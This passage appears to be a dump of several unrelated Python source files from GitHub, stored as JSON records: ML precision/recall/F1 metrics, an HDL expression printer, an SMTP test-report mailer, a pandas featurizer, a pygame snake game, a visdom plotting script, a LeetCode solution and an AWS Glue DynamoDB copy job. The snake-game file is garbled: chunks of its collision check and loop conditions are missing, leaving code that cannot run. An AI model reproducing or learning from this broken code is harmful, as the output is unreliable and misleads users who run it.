save_mean:\n mean_metric = np.mean(metric)\n metrics[\"{}_mean\".format(metric_name)] = mean_metric\n\n if calculate_f1:\n # Ensure we have values for precision and recall\n if 'precision' not in metrics:\n precisions = precision(\n TPs=TPs,\n TNs=TNs,\n FPs=FPs,\n FNs=FNs)\n else:\n precisions = metrics['precision']\n if 'recall' not in metrics:\n recalls = recall(\n TPs=TPs,\n TNs=TNs,\n FPs=FPs,\n FNs=FNs)\n else:\n recalls = metrics['recall']\n\n # Calculate and store f1\n f1_score= f1(\n precisions=precisions,\n recalls=recalls)\n metrics['f1'] = f1_score\n if save_mean:\n metrics[\"f1_mean\"] = np.mean(f1_score)\n\n return metrics\n\ndef per_class_accuracy(TPs, TNs, FPs, FNs):\n '''\n Given true positives, true negatives, false positives, and false negatives,\n calculate per class accuracy\n\n Arg(s):\n TPs : C-length np.array\n True positives for each class\n TNs : C-length np.array\n True negatives for each class\n FPs : C-length np.array\n False positives for each class\n FNs : C-length np.array\n False negatives for each class\n Returns\n per_class_accuracies : C-length np.array\n per class accuracy = (TP + TN) / (TP + FP + TN + FN)\n '''\n return np.nan_to_num((TPs + TNs) / (TPs + TNs + FPs + FNs))\n\ndef precision(TPs, TNs, FPs, FNs):\n '''\n Given true positives, true negatives, false positives, and false negatives,\n calculate per class precision\n\n Arg(s):\n TPs : C-length np.array\n True positives for each class\n TNs : C-length np.array\n True negatives for each class\n FPs 
: C-length np.array\n False positives for each class\n FNs : C-length np.array\n False negatives for each class\n Returns\n precisions : C-length np.array\n precision = TP / (TP + FP)\n '''\n return np.nan_to_num(TPs / (TPs + FPs))\n\ndef recall(TPs, TNs, FPs, FNs):\n '''\n Given true positives, true negatives, false positives, and false negatives,\n calculate per class recall\n\n Arg(s):\n TPs : C-length np.array\n True positives for each class\n TNs : C-length np.array\n True negatives for each class\n FPs : C-length np.array\n False positives for each class\n FNs : C-length np.array\n False negatives for each class\n Returns\n recall : C-length np.array\n recall = TP / (TP + FN)\n '''\n return np.nan_to_num(TPs / (TPs + FNs))\n\ndef f1(precisions, recalls):\n '''\n Given precision and recall for each class,\n calculate f1 score per class\n\n Arg(s):\n precisions : C-length np.array\n precisions for each class\n recalls : C-length np.array\n recalls for each class\n\n Returns:\n f1s : C-length np.array\n f1 = 2 * precision * recall / (precision + recall)\n '''\n return np.nan_to_num(2 * precisions * recalls / (precisions + recalls))\n\ndef accuracy(prediction, target):\n '''\n Return accuracy\n Arg(s):\n prediction : N x 1 torch.tensor\n logit outputs of model\n target : N x 1 torch.tensor\n integer labels\n Returns:\n float : accuracy of predictions\n\n '''\n\n assert len(prediction.shape) == 1, \"Prediction must be 1-dim array, received {}-shape array.\".format(prediction.shape)\n assert len(target.shape) == 1, \"Target must be 1-dim array, received {}-shape array.\".format(target.shape)\n\n # Convert to numpy arrays\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n correct = np.sum(prediction == target)\n return correct / len(target)\n\n\ndef predicted_class_distribution(prediction, n_classes=10):\n '''\n Given a list of predictions, return a counts of number predictions in each class\n\n Arg(s):\n prediction : 1D np.array or torch.tensor\n class prediction for each sample\n\n Returns:\n class_distribution : 1D np.array with length = # classes\n '''\n # Convert to numpy arrays\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n\n class_distribution = np.bincount(prediction, minlength=n_classes)\n return class_distribution\n\ndef accuracy_from_outputs(output, target):\n '''\n Return accuracy\n Arg(s):\n output : N x C torch.tensor\n logit outputs of model\n target : N x 1 torch.tensor\n integer labels\n Returns:\n float : accuracy of predictions\n\n '''\n with torch.no_grad():\n pred = torch.argmax(output, dim=1)\n assert pred.shape[0] == len(target)\n correct = 0\n correct += torch.sum(pred == target).item()\n return correct / len(target)\n\ndef _accuracy(output, target):\n print(\"helper acc\")\n with torch.no_grad():\n pred = torch.argmax(output, dim=1)\n assert pred.shape[0] == len(target)\n correct = 0\n correct += torch.sum(pred == target).item()\n return torch.tensor([correct]), torch.tensor([len(target)])\n\n\ndef top_k_acc(output, target, k=3):\n with torch.no_grad():\n pred = torch.topk(output, k, dim=1)[1]\n assert pred.shape[0] == len(target)\n correct = 0\n for i in range(k):\n correct += torch.sum(pred[:, i] == target).item()\n return correct / len(target)\n\n# This was actually calculating recall\n# def per_class_accuracy_from_predictions(prediction, target, unique_labels=None):\n# '''\n# Return the accuracy of each class\n\n# Arg(s):\n# prediction : B-dim 
torch.tensor or np.array\n# model prediction (post-argmax)\n# target : B-dim torch.tensor or np.array\n# integer binary ground truth labels\n# unique_labels : list[int]\n# can specify expected labels\n# Returns:\n# C x 1 np.array of per class accuracy\n# '''\n# # Convert to numpy arrays\n# if torch.is_tensor(prediction):\n# prediction = prediction.cpu().numpy()\n# if torch.is_tensor(target):\n# target = target.cpu().numpy()\n\n# if unique_labels is None:\n# n_classes = np.unique(target).shape[0] # assumes all classes are in target and go from 0 to n_classes - 1\n# unique_labels = [i for i in range(n_classes)]\n# else:\n# n_classes = len(unique_labels)\n# # Make confusion matrix (rows are true, columns are predicted)\n# assert prediction.shape[0] == target.shape[0]\n# cmat = confusion_matrix(\n# target,\n# prediction,\n# labels=unique_labels)\n\n# # Get counts\n# pred_counts = np.diagonal(cmat)\n# target_counts = np.sum(cmat, axis=1)\n\n# # Nan occurs if no target counts. In these cases, set those classes to 0\n# return np.nan_to_num(pred_counts / target_counts)\n\ndef per_class_accuracy_outputs(output, target):\n '''\n Return the accuracy of each class\n\n Arg(s):\n output : B x C torch.tensor or np.array\n model outputs (pre-softmax)\n target : B-dim torch.tensor or np.array\n integer binary ground truth labels\n\n Returns:\n C x 1 np.array of per class accuracy\n '''\n # Convert to numpy arrays\n if torch.is_tensor(output):\n output = output.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n # Make confusion matrix (rows are true, columns are predicted)\n n_classes = output.shape[1]\n pred = np.argmax(output, axis=1)\n assert pred.shape[0] == len(target)\n cmat = confusion_matrix(\n target,\n pred,\n labels=[i for i in range(n_classes)])\n\n # Get counts\n pred_counts = np.diagonal(cmat)\n target_counts = np.sum(cmat, axis=1)\n\n # Nan occurs if no target counts. 
In these cases, set those classes to 0\n return np.nan_to_num(pred_counts / target_counts)\n\n\ndef precision_recall_f1_from_predictions(prediction, target, unique_labels=None):\n '''\n Given outputs and targets, calculate per-class precision\n\n Arg(s):\n prediction : B-dim torch.tensor or np.array\n model prediction\n target : B-dim torch.tensor or np.array\n ground truth target classes\n unique_labels : list[int]\n can specify expected labels\n\n Returns:\n (precisions, recalls, f1s)\n 3-tuple of lists\n '''\n # Move off of gpu and convert to numpy if necessary\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n if unique_labels is None:\n n_classes = np.unique(target).shape[0] # assumes all classes are in target and go from 0 to n_classes - 1\n unique_labels = [i for i in range(n_classes)]\n\n precisions = []\n recalls = []\n f1s = []\n\n # Calculate precision, recall, f1 for each class\n for label in unique_labels:\n # Need True Positives, False Positives, and False Negatives\n TP = np.sum(np.where(((prediction == label) & (target == label)), 1, 0))\n FP = np.sum(np.where(((prediction == label) & (target != label)), 1, 0))\n FN = np.sum(np.where(((prediction != label) & (target == label)), 1, 0))\n\n # Calculate metrics\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n f1 = (2 * precision * recall) / (precision + recall)\n\n # Store in respective lists\n precisions.append(precision)\n recalls.append(recall)\n f1s.append(f1)\n\n return precisions, recalls, f1s\n","repo_name":"allisonchen23/model-editing","sub_path":"src/model/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":12889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42536422559","text":"from enum import Enum\n\nfrom hdlConvertorAst.hdlAst import HdlModuleDec, HdlOp\nfrom hdlConvertorAst.hdlAst._expr import HdlOpType, HdlValueId, HdlValueInt\nfrom hdlConvertorAst.py_ver_compatibility import is_str\nfrom hdlConvertorAst.to.hdlUtils import AutoIndentingStream, iter_with_last\nfrom hdlConvertorAst.to.hdl_ast_visitor import HdlAstVisitor\n\n\n# https://www.geeksforgeeks.org/operator-precedence-and-associativity-in-c/\n# http://www.euroelectronica.ro/7-operators/\n# https://gist.github.com/kputnam/5625856\n# https://github.com/kaitai-io/kaitai_struct/issues/69\nclass ASSOCIATIVITY(Enum):\n L_TO_R = \"L_TO_R\"\n R_TO_L = \"R_TO_L\"\n NONE = \"NONE\"\n\n\nASSIGN_OPERATORS_SYMBOLS_C = {\n HdlOpType.ASSIGN: ' = ',\n HdlOpType.PLUS_ASSIGN: ' += ',\n HdlOpType.MINUS_ASSIGN: ' -= ',\n HdlOpType.MUL_ASSIGN: ' *= ',\n HdlOpType.DIV_ASSIGN: ' /= ',\n HdlOpType.MOD_ASSIGN: ' %= ',\n HdlOpType.AND_ASSIGN: ' &= ',\n HdlOpType.OR_ASSIGN: ' |= ',\n HdlOpType.XOR_ASSIGN: ' ^= ',\n HdlOpType.SHIFT_LEFT_ASSIGN: ' <<= ',\n HdlOpType.SHIFT_RIGHT_ASSIGN: ' >>= ',\n}\n\n\nclass ToHdlCommon(HdlAstVisitor):\n\n INDENT_STEP = \" \"\n ALL_UNARY_OPS = {\n getattr(HdlOpType, name) for name in dir(HdlOpType)\n if name.endswith(\"_UNARY\")\n }\n GENERIC_UNARY_OPS = {\n HdlOpType.PLUS_UNARY: \"+\",\n HdlOpType.MINUS_UNARY: \"-\",\n }\n GENERIC_UNARY_OPS_POSTFIX = {}\n GENERIC_BIN_OPS = {\n HdlOpType.ADD: \" + \",\n HdlOpType.SUB: \" - \",\n HdlOpType.MUL: \" * \",\n\n HdlOpType.LT: \" < \",\n HdlOpType.LE: \" <= \",\n HdlOpType.GT: \" > \",\n HdlOpType.GE: \" >= \",\n\n HdlOpType.DOT: \".\",\n }\n\n def __init__(self, out_stream):\n super(ToHdlCommon, self).__init__()\n self.out = 
AutoIndentingStream(out_stream, self.INDENT_STEP)\n\n def visit_doc(self, obj, line_comment_prefix):\n \"\"\"\n Format doc as line comments\n\n :type line_comment_prefix: str\n \"\"\"\n doc = obj.doc\n if doc is not None:\n doc = doc.split(\"\\n\")\n w = self.out.write\n for last, d in iter_with_last(doc):\n if last and d == \"\":\n break\n w(line_comment_prefix)\n w(d.replace('\\r', ''))\n w(\"\\n\")\n\n def _precedence_of_expr(self, o):\n \"\"\"\n :type o: iHdlExpr\n \"\"\"\n # not id or value\n if not isinstance(o, HdlOp):\n return (-1, ASSOCIATIVITY.NONE, None)\n return self.OP_PRECEDENCE[o.fn] + (o.fn,)\n\n def visit_HdlOp(self, op):\n \"\"\"\n :type op: HdlOp\n \"\"\"\n o = op.fn\n w = self.out.write\n argc = len(op.ops)\n if argc == 1:\n op_str = self.GENERIC_UNARY_OPS.get(o, None)\n if op_str is not None:\n w(op_str)\n self._visit_operand(op.ops[0], 0, op, False, False)\n return\n op_str = self.GENERIC_UNARY_OPS_POSTFIX.get(o, None)\n if op_str is not None:\n self._visit_operand(op.ops[0], 0, op, False, False)\n w(op_str)\n return\n\n if argc == 2:\n op_str = self.GENERIC_BIN_OPS.get(o, None)\n if op_str is not None:\n return self._visit_bin_op(op, op_str)\n if o == HdlOpType.INDEX:\n return self._visit_operator_index(op)\n elif o == HdlOpType.CALL or o == HdlOpType.PARAMETRIZATION:\n return self.visit_operator_call(op)\n else:\n raise NotImplementedError(\n \"Do not know how to convert %s argc:%d\" % (o, argc))\n\n def visit_iHdlExpr(self, o):\n \"\"\"\n :type o: iHdlExpr\n \"\"\"\n w = self.out.write\n if isinstance(o, HdlValueId):\n w(o.val)\n return\n elif is_str(o):\n w('\"%s\"' % o.replace(\"\\n\", \"\\\\\\n\"))\n return\n elif isinstance(o, HdlValueInt):\n self.visit_HdlValueInt(o)\n return\n elif isinstance(o, HdlOp):\n self.visit_HdlOp(o)\n return\n elif isinstance(o, float):\n w(\"%e\" % o)\n else:\n raise NotImplementedError(\n \"Do not know how to convert %r\" % (o))\n\n def _visit_operand_parentheses_extra_check(\n self,\n op_my, precedence_my, asoc_my,\n op_parent, precedence_parent, asoc_parent,\n left, right):\n if op_my in self.ALL_UNARY_OPS and op_parent in self.ALL_UNARY_OPS:\n return True\n return False\n\n def _visit_operand(self, operand, i,\n parent,\n expr_requires_parenthesis,\n cancel_parenthesis):\n \"\"\"\n :type operand: iHdlExpr\n :type i: int\n :type parent: HdlOp\n :type expr_requires_parenthesis: bool\n :type cancel_parenthesis: bool\n \"\"\"\n use_parenthesis = False\n if not cancel_parenthesis:\n # resolve if the parenthesis are required\n precedence_my, asoc_my, op_my = self._precedence_of_expr(operand)\n if precedence_my >= 0: # if this is an expression\n if expr_requires_parenthesis or asoc_my is ASSOCIATIVITY.NONE:\n use_parenthesis = True\n else:\n precedence_parent, asoc_parent = self.OP_PRECEDENCE[parent.fn]\n right = None\n left = None\n argc = len(parent.ops)\n assert argc, parent\n if argc == 1:\n if asoc_parent == ASSOCIATIVITY.L_TO_R:\n # post fix\n left = parent.ops[0]\n else:\n assert asoc_parent == ASSOCIATIVITY.R_TO_L, asoc_parent\n right = parent.ops[0]\n else:\n if i == 0:\n right = parent.ops[1]\n else:\n left = parent.ops[i - 1]\n if argc > i + 2:\n right = parent.ops[i + 1]\n\n if self._visit_operand_parentheses_extra_check(\n op_my, precedence_my, asoc_my, parent.fn,\n precedence_parent, asoc_parent, left, right):\n use_parenthesis = True\n else:\n if left is not None: # \"operand\" is on right side of parent operator\n # same precedence -> parenthesis on right (this) if it is expression\n # a + (b + c)\n # a + b + c = (a + 
b) + c\n # right with lower precedence -> parenthesis for right not required\n # a + b * c = a + (b * c)\n # right with higher precedence -> parenthesis for right\n # a * (b + c)\n if precedence_my > precedence_parent:\n use_parenthesis = True\n elif precedence_my == precedence_parent:\n use_parenthesis = argc != 1 or asoc_parent != ASSOCIATIVITY.L_TO_R\n\n if not use_parenthesis and right is not None:\n # \"operand\" is on left side of parent operator\n # if op_my == parent.fn:\n # right_prec, _, right_op = self._precedence_of_expr(right)\n # if right_op == op_my:\n # # right and left with same precedence -> parenthesis on both sides\n # # (a + b) + (c + d)\n # use_parenthesis = True\n if precedence_my > precedence_parent:\n # left with higher precedence -> parenthesis for left\n # (a + b) * c\n # a + b + c + d = (a + b) + c + d\n # = ((a + b) + c) + d\n use_parenthesis = True\n\n w = self.out.write\n if use_parenthesis:\n w(\"(\")\n self.visit_iHdlExpr(operand)\n if use_parenthesis:\n w(\")\")\n\n def _visit_bin_op(self, operator, op_str,\n expr_requires_parenthesis=False,\n cancel_parenthesis=False):\n \"\"\"\n :type operator: HdlOp\n :type op_str: str\n \"\"\"\n op0, op1 = operator.ops\n self._visit_operand(op0, 0, operator, expr_requires_parenthesis,\n cancel_parenthesis)\n self.out.write(op_str)\n self._visit_operand(op1, 1, operator, expr_requires_parenthesis,\n cancel_parenthesis)\n\n def _visit_operator_index(self, operator):\n \"\"\"\n :type operator: HdlOp\n \"\"\"\n op0, op1 = operator.ops\n self._visit_operand(op0, 0, operator, False, False)\n w = self.out.write\n w(\"[\")\n self._visit_operand(op1, 1, operator, False, True)\n w(\"]\")\n\n def visit_operator_call(self, o):\n \"\"\"\n :type operator: HdlOp\n \"\"\"\n self._visit_operand(o.ops[0], 0, o, False, False)\n w = self.out.write\n w(\"(\")\n for is_last, (o_i, _o) in iter_with_last(enumerate(o.ops[1:])):\n self._visit_operand(_o, o_i, o, False, True)\n if not is_last:\n w(\", \")\n w(\")\")\n\n def visit_HdlFunctionDef(self, o):\n \"\"\"\n :type o: HdlFunctionDef\n \"\"\"\n raise TypeError(\"does not support HdlFunctionDef\", self, o)\n\n def visit_HdlStmProcess(self, o):\n \"\"\"\n :type proc: HdlStmProcess\n \"\"\"\n raise TypeError(\"does not support HdlStmProcess\", self, o)\n\n def visit_HdlStmBlock(self, o):\n \"\"\"\n :type o: HdlStmBlock\n \"\"\"\n raise TypeError(\"does not support HdlStmBlock\", self, o)\n\n def visit_HdlStmIf(self, o):\n \"\"\"\n :type o: HdlStmIf\n \"\"\"\n raise TypeError(\"does not support HdlStmIf\", self, o)\n\n def visit_HdlStmCase(self, o):\n \"\"\"\n :type o: HdlStmCase\n \"\"\"\n raise TypeError(\"does not support HdlStmCase\", self, o)\n\n def visit_HdlStmWait(self, o):\n \"\"\"\n :type o: HdlStmWait\n \"\"\"\n raise TypeError(\"does not support HdlStmWait\", self, o)\n\n def visit_HdlStmFor(self, o):\n \"\"\"\n :type o: HdlStmFor\n \"\"\"\n raise TypeError(\"does not support HdlStmFor\", self, o)\n\n def visit_HdlStmForIn(self, o):\n \"\"\"\n :type o: HdlStmForIn\n \"\"\"\n raise TypeError(\"does not support HdlStmForIn\", self, o)\n\n def visit_HdlStmWhile(self, o):\n \"\"\"\n :type o: HdlStmWhile\n \"\"\"\n raise TypeError(\"does not support HdlStmWhile\", self, o)\n\n def visit_HdlStmAssign(self, o):\n \"\"\"\n :type o: HdlStmAssign\n \"\"\"\n raise TypeError(\"does not support HdlStmAssign\", self, o)\n\n def visit_HdlStmRepeat(self, o):\n \"\"\"\n :type o: HdlStmRepeat\n \"\"\"\n raise TypeError(\"does not support HdlStmRepeat\", self, o)\n\n def visit_HdlStmReturn(self, o):\n 
\"\"\"\n :type o: HdlStmReturn\n \"\"\"\n raise TypeError(\"does not support HdlStmReturn\", self, o)\n\n def visit_HdlStmContinue(self, o):\n \"\"\"\n :type o: HdlStmContinue\n \"\"\"\n raise TypeError(\"does not support HdlStmContinue\", self, o)\n\n def visit_HdlStmBreak(self, o):\n \"\"\"\n :type o: HdlStmBreak\n \"\"\"\n raise TypeError(\"does not support HdlStmBreak\", self, o)\n\n","repo_name":"Nic30/hdlConvertorAst","sub_path":"hdlConvertorAst/to/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":11881,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"42756472589","text":"from dataclasses import dataclass\ng:str = \"hello\"\na = type(\n \"hello\",\n (),\n dict(g = g)\n)\ndef b(a=0):\n print(a)\n\n\nclass testc:\n aa:str = 2\n bb = 1\n\n def __getitem__(self, item):\n print(self.__getattribute__(item))\n\n# def test_m(i:str):\n# a = {\n# \"h\":233\n# }\n# return a[i]\n\na = testc()\na[\"aa\"]\n# args = {\n# \"aa\":1\n# }\n# gg = testc(aa = \"2\")\n#\n#\n# b(1)\n# print(a)\n\n","repo_name":"WendaoLee/toys","sub_path":"JerseyWebGIS/orm/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13805657046","text":"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\nimport os,time\nfrom base.read_config import get_config\nfrom email.mime.application import MIMEApplication\ndef send_email(reporthtml,resultxlsx):\n #创建一个邮件\n msg=MIMEMultipart()\n #邮件标题\n msg['Subject'] = Header('接口自动化测试报告', 'utf-8')\n msg['from']=get_config('EMAIL', 'sender') # 发送邮件的人\n msg['to']=get_config('EMAIL', 'receiver')\n #邮件正文内容\n content=MIMEText(open(reporthtml,'rb').read(),'html','utf-8')\n #将邮件内容添加到邮件\n msg.attach(content)\n #添加xlsx附件\n attacxlsx = MIMEApplication(open(resultxlsx,'rb').read())\n attacxlsx.add_header('Content-Disposition', 'attachment', filename=resultxlsx)\n msg.attach(attacxlsx)\n #添加html附件\n attachhtml=MIMEApplication(open(reporthtml,'rb').read())\n attachhtml.add_header('Content-Disposition', 'attachment', filename=reporthtml)\n msg.attach(attachhtml)\n '''\n attachhtml = MIMEText(open(reporthtml,'rb').read(), 'base64', 'utf-8')\n attachhtml['Content-Type'] = 'application/octet-stream'\n attachhtml[\"Content-Disposition\"] = 'attachment;filename=\"APIReport.html\"'\n msg.attach(attachhtml)'''\n try:\n s = smtplib.SMTP_SSL(get_config('EMAIL', 'serverip'), get_config('EMAIL', 'serverport'))#ssl加密方式登录邮箱\n s.login(get_config('EMAIL','username'), get_config('EMAIL','password'))\n # 这里的to_address是真正需要发送的到的mail邮箱地址需要的是一个list\n s.sendmail(msg['from'],msg['to'], msg.as_string())\n print('%s----发送邮件成功' % time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n except Exception as err:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n print(err)\n#2.定义:取最新测试报告\ndef get_NewFile(file_dir):\n #列举test_dir目录下的所有文件,结果以列表形式返回。\n listreport=os.listdir(file_dir)\n #sort按key的关键字进行排序,lambda的入参fn为lists列表的元素,获取文件的最后修改时间\n #最后对lists元素,按文件修改时间大小从小到大排序。\n listreport.sort(key=lambda fn:os.path.getmtime(file_dir+'\\\\'+fn))\n #获取最新文件的绝对路径\n file_path=os.path.join(file_dir,listreport[-1])\n# L=file_path.split('\\\\')\n# file_path='\\\\\\\\'.join(L)\n return file_path\n 
\n","repo_name":"wfl19890917/API_AutoTest","sub_path":"public/sendEmail.py","file_name":"sendEmail.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36993330549","text":"from typing import List\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def preorderTraversal(self, root: TreeNode) -> List[int]:\n if not root:\n return []\n stack = []\n stack.append(root)\n result = []\n\n while stack:\n node = stack[0]\n stack = stack[1:]\n result.append(node.val)\n if node.right:\n stack.insert(0, node.right)\n\n if node.left:\n stack.insert(0, node.left)\n\n return result\n\nif __name__ == \"__main__\":\n root = TreeNode(1)\n root.right = TreeNode(2)\n root.right.left = TreeNode(3)\n sol = Solution()\n print(sol.preorderTraversal(root))","repo_name":"sumanshil/TopCoder","sub_path":"TopCoder/python/PreOrderTraversal.py","file_name":"PreOrderTraversal.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9320942842","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 01 16:28:31 2016\n\n@author: genkinjz\n\"\"\"\nfrom featurizer import Featurizer\nimport pandas as pd\nfrom dataIDs import DataConstants as dc\n\n\nclass ContextFeaturizer(Featurizer):\n\n def __init__(self,context_data_ids):\n Featurizer.__init__(self)\n self.data_ids = context_data_ids\n return \n \n def can_featurize(self, data,**kwargs):\n return True,\"\"\n \n \n def _Featurizer__do_featurize(self, context_df):\n output_df = pd.DataFrame()\n \n output_df = context_df.copy()\n \n for col in output_df.columns:\n if not self.__include(col): output_df.drop(col)\n for data_id in self.data_ids:\n if data_id.data_category == dc.NOMINAL:\n output_df = pd.get_dummies(output_df,columns=[data_id.uniq_id])\n elif data_id.data_category == dc.ORDINAL:\n output_df[data_id.uniq_id] = context_df[data_id.uniq_id].astype(\"category\").cat.codes\n return output_df\n \n \n def __include(self,uniq_id):\n return uniq_id in [data_id.uniq_id for data_id in self.data_ids]\n","repo_name":"jgenk/icu_data_viz","sub_path":"processor_v6/context_featurizer.py","file_name":"context_featurizer.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27507865961","text":"import pygame, random, sys\nfrom pygame.locals import *\n\ndef collide(x1, x2, y1, y2, w1, w2, h1, h2):\n if x1+w1>x2 and x1y2 and y1= 2:\n if collide(a[0], a[i], b[0], b[i], 20, 20, 20, 20):\n lose(s, points)\n i-= 1\n if collide(a[0], applepos[0], b[0], applepos[1], 20, 10, 20, 10):\n points+=1\n a.append(700)\n b.append(700)\n applepos=(random.randint(0,590),random.randint(0,590))\n \n if a[0] < 0 or a[0] > 580 or b[0] < 0 or b[0] > 580:\n lose(s, points)\n i = len(a)-1\n \n while i >= 1:\n a[i] = a[i-1]\n b[i] = b[i-1]\n i -= 1\n if z==0:\n b[0] += 20\n elif z==1:\n a[0] += 20\n elif z==2:\n b[0] -= 20\n elif z==3:\n a[0] -= 20\t\n s.fill((255, 255, 255))\t\n \n for i in range(0, len(a)):\n s.blit(img, (a[i], b[i]))\n s.blit(appleimage, applepos)\n t=f.render(str(points), True, (0, 0, 0))\n s.blit(t, (10, 10))\n 
pygame.display.update()","repo_name":"PremNair123/ur4gungame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11328245052","text":"import math\n\ndef ClosestValue(num, divisor):\n quotient = num / divisor\n str1 = str(quotient)\n n = len(str1)\n\n i = 0\n while i < n-1:\n if str1[i] == '.':\n value = int(str1[i+1])\n break\n i = i+1\n \n if quotient > 0:\n if value < 5:\n x = math.trunc(quotient)\n ans = divisor * x\n return ans\n else:\n x = math.trunc(math.ceil(quotient))\n ans = divisor * x\n return ans\n else:\n if value < 5:\n x = math.trunc(quotient)\n ans = divisor * x\n return ans\n else:\n x = math.trunc(math.floor(quotient))\n ans = divisor * x\n return ans\n\n\n\nif __name__ == \"__main__\":\n # num = -15 # num = 13\n # divisor = 6 # divisor = 4\n\n t = int(input(\"\\nEnter the Number of TestCases: \"))\n\n while t:\n num, divisor = map(int, input(\"\\nEnter the Number to find the Closest value: \").split())\n ans = ClosestValue(num, divisor)\n print(\"Closest value to {} is {}\" .format(num, ans))\n\n print()\n t = t-1\n\n print(\"\\n\")\n\n","repo_name":"maxkashyap41/pythonDSA","sub_path":"String/Closest_Value.py","file_name":"Closest_Value.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30098518922","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport re\nimport visdom\n\n\n\n# progress_folder = '/home/weikaichen/hegsns/Python Proj/high-level-skill/network_reserve/half_cheetah_hurdle_v0_model_1210/HalfCheetah_hurdle-v0/HalfCheetah_hurdle-v0_s0'\n# progress_folder = './network_reserve/sac_gpu/HalfCheetah_hurdle-v0/s0'\n# progress_folder = './network_reserve/model_2323_diversity_trans_matrix_gpu/HalfCheetah_hurdle-v0/s0/'\n# progress_folder = './network_reserve/model_1210/HalfCheetah_hurdle-v0/s0'\n# progress_folder = './network_reserve/model_2323_diversity_trans_matrix_gpu/HalfCheetah_hurdle-v2/s0'\n# progress_folder = './network_reserve/sac_gpu/HalfCheetah_hurdle-v2/s0'\nprogress_folder = './network_reserve/model_1211/HalfCheetah_hurdle-v2/s0'\n# progress_folder = './network_reserve/model_2323_diversity_combine/HalfCheetah_hurdle-v0/s0'\n# progress_folder = './network_reserve/model_1128_diversity_combine/HalfCheetah_hurdle-v0/s0'\n\nfname = '/progress-1-2.8.txt'\n\nprogress = open(progress_folder + fname)\nraw_data = progress.read()\n\npattern = re.compile(r'\\d+\\t[-+]?\\d+.\\d+\\t\\d+\\n')\nraw_data2 = pattern.findall(raw_data)\nprint(raw_data2)\neplisode_buf = []\nreward_buf = []\nsuccess_buf = [0]\nfor idx, value in enumerate(raw_data2):\n # if idx >= 4:\n eplisode_str, reward_str, success_str = value.split('\\t')\n eplisode_buf.append(int(eplisode_str))\n reward_buf.append(float(reward_str[0:-2]))\n success_buf.append(success_buf[-1] + int(success_str))\n\nvis = visdom.Visdom()\nwin = vis.line(\n X=np.array(eplisode_buf),\n Y=np.array(success_buf[1:]),\n opts=dict(\n # xtickmin=-2,\n # xtickmax=2,\n # xtickstep=1,\n # ytickmin=-1,\n # ytickmax=5,\n # ytickstep=1,\n title=(fname),\n markersymbol='dot',\n markersize=5,\n ),\n # update=\"new\",\n name=\"1\",\n 
)","repo_name":"qxtian/Learning-Independent-SKills","sub_path":"IndependentSkillTransfer/reward_plot.py","file_name":"reward_plot.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"71876983208","text":"import sys\nfrom typing import List\n\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n \"\"\"\n index1 = 0\n index2 = len(s)-1\n while index1 < index2:\n s[index1], s[index2] = s[index2], s[index1]\n index1 += 1\n index2 -= 1\n\n\n print(s)\n\nsolution = Solution()\nprint(solution.reverseString(list(sys.argv[1])))","repo_name":"nikpopesku/leetcode","sub_path":"python/300-399/344_reverse_string.py","file_name":"344_reverse_string.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28851749648","text":"# Reference: https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-dynamo-db-cross-account.html\n\nimport sys\nfrom awsglue.utils import getResolvedOptions\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom awsglue.job import Job\n\nargs = getResolvedOptions(sys.argv, [\"JOB_NAME\"])\nglue_context= GlueContext(SparkContext.getOrCreate())\njob = Job(glue_context)\njob.init(args[\"JOB_NAME\"], args)\n\ndyf = glue_context.create_dynamic_frame_from_options(\n connection_type=\"dynamodb\",\n connection_options={\n \"dynamodb.region\": \"us-west-2\",\n \"dynamodb.input.tableName\": \"\",\n \"dynamodb.sts.roleArn\": \"\"\n }\n)\ndyf.show()\n \nglue_context.write_dynamic_frame_from_options(\n frame=dyf,\n connection_type=\"dynamodb\",\n connection_options={\n \"dynamodb.region\": \"us-west-2\",\n \"dynamodb.output.tableName\": \"\"\n 